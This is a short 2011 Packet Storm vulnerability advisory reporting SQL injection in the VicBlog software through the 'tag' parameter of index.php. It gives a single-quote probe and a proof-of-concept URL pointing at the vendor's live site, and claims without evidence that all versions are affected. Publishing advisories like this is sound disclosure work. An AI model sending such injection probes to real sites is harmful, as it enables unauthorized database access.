VicBlog SQL Injection

2011-08-24T00:00:00
ID PACKETSTORM:104402
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-24T00:00:00

Description

                                        
                                            `# Exploit Title: VicBlog SQL Injection  
# Date: 2011  
# Author: Eyup CELIK  
# Software Link: http://www.vicdesigns.com.au  
# Version: All Version  
# Tested on: All versions are Vulnerability  
  
ISSUE  
  
SQL Injection can be done using the command input  
  
Vulnerable Page:  
index.php  
  
Example:  
index.php?page=posts&tag=<SQL Injection Code>  
  
Exploit:  
index.php/1'  
  
POC:  
http://www.vicdesigns.com.au/vicblog/index.php?page=posts&tag=1%27  
  
  
Thanks,  
  
  
Eyup CELIK  
Bilgi Teknolojileri Güvenlik Uzmani  
http://www.eyupcelik.com.tr  
`